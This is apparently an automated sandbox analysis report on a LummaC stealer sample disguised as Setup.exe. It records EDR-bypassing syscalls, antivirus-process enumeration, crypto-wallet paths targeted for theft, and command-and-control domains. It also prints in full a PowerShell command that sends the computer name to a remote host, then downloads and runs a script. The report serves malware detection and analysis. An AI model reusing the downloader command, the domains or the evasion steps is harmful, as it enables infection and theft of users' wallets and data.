              Found direct / indirect Syscall (likely to bypass EDR)
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeNtQuerySystemInformation: Direct from: 0x4585B0
              LummaC encrypted strings found
              Source: Setup.exeString found in binary or memory: cloudewahsj.shop
              Source: Setup.exeString found in binary or memory: rabidcowse.shop
              Source: Setup.exeString found in binary or memory: noisycuttej.shop
              Source: Setup.exeString found in binary or memory: nearycrepso.shop
              Source: Setup.exeString found in binary or memory: abberanteusz.click
              Source: Setup.exeString found in binary or memory: tirepublicerj.shop
              Source: Setup.exeString found in binary or memory: framekgirus.shop
              Source: Setup.exeString found in binary or memory: wholersorie.shop
              Source: Setup.exeString found in binary or memory: abruptyopsn.shop
              Source: C:\Users\user\AppData\Local\Temp\is-LJ1A5.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe "C:\Users\user\AppData\Local\Temp\WPNMSIA79IRF0S6IHRZ7TIDHI.exe" /VERYSILENTJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-Q2J7A.tmp\WPNMSIA79IRF0S6IHRZ7TIDHI.tmpProcess created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe "C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "wrsa.exe"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "opssvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avastui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "avgui.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; fg
              Source: C:\Users\user\Desktop\Setup.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [net.servicepointmanager]::securityprotocol = [net.securityprotocoltype]::tls12; $gd='https://dfgh.online/invoker.php?compname='+$env:computername; $ptsr = iwr -uri $gd -usebasicparsing -useragent 'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/57.36 (khtml, like gecko) chrome/12.0.0.0 safari/57.36'; iex $ptsr.content; fgJump to behavior
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowahk_idpidclassgroup%s%uProgram Manager\P{Xps}\H\P{Xan}\P{Lu}\P{Ll}\P{L}\p{Xps}\h\p{Xan}\p{Lu}\p{Ll}\p{L}\p{Xwd}\P{Xwd}\p{Xsp}\P{Xsp}\p{Nd}\P{Nd}Error text not found (please report)Q\E{0,DEFINEUTF8)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressioninternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
              Source: BrightLib.exe, 00000024.00000000.2410384629.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, BrightLib.exe, 00000024.00000002.2452041349.000000000049A000.00000002.00000001.01000000.0000000E.sdmp, is-7IJ4L.tmp.9.drBinary or memory string: regk-hookm-hook2-hooksjoypollPART(no)%s%s%s%s%s{Raw}%s%cHotstring max abbreviation length is 40.LEFTLRIGHTRMIDDLEMX1X2WUWDWLWRSendInputuser32{Blind}{ClickLl{}^+!#{}RawTempSsASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt sc%03Xvk%02XALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUP...%s[%Iu of %Iu]: %-1.60s%sHKLMHKEY_LOCAL_MACHINEHKCRHKEY_CLASSES_ROOTHKCCHKEY_CURRENT_CONFIGHKCUHKEY_CURRENT_USERHKUHKEY_USERSREG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYMasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightAddDefaultIconNoIconDestroyNamePriorityInterruptNoTimersTypeONLocalePermitMouseSendAndMouseMouseMoveOffPlayEventThenEventThenPlayYESNOOKCANCELABORTIGNORERETRYCONTINUETRYAGAINTimeoutMINMAXHIDEScreenRelativeWindowClientPixelCaretIntegerFloatNumberTimeDateDigitXdigitAlnumAlphaUpperLowerUTF-8UTF-8-RAWUTF-16UTF-16-RAWCPRemoveClipboardFormatListenerAddClipboardFormatListenerTrayNo tray memstatus AHK_PlayMe modeclose AHK_PlayMe.aut%s\%sRegClassAutoHotkey2Shell_TrayWndCreateWindoweditLucida ConsoleConsolasCritical Error: %s
              Source: C:\Users\user\Desktop\Setup.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeQueries volume information: C:\Users\user\AppData\Local\Temp\5b9cb0ef VolumeInformation
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeCode function: 36_2_00491486 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,36_2_00491486
              Source: C:\Users\user\Desktop\Setup.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: find.exe, 0000001B.00000002.2363311941.00000188DB950000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: avgui.exe
              Source: Setup.exe, 00000000.00000003.1972142744.00000000006D0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.1974727785.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.1890502040.00000000006CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\Setup.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Yara detected LummaC Stealer
              Source: Yara matchFile source: Process Memory Space: Setup.exe PID: 7316, type: MEMORYSTR
              Source: Yara matchFile source: 00000000.00000002.1975465671.0000000002020000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Found many strings related to Crypto-Wallets (likely being stolen)
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Electrum-LTC\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\ElectronCash\wallets
              Source: Setup.exe, 00000000.00000003.1842566188.00000000006DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxx Libertycount-:
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: Setup.exe, 00000000.00000003.1842566188.0000000000676000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"
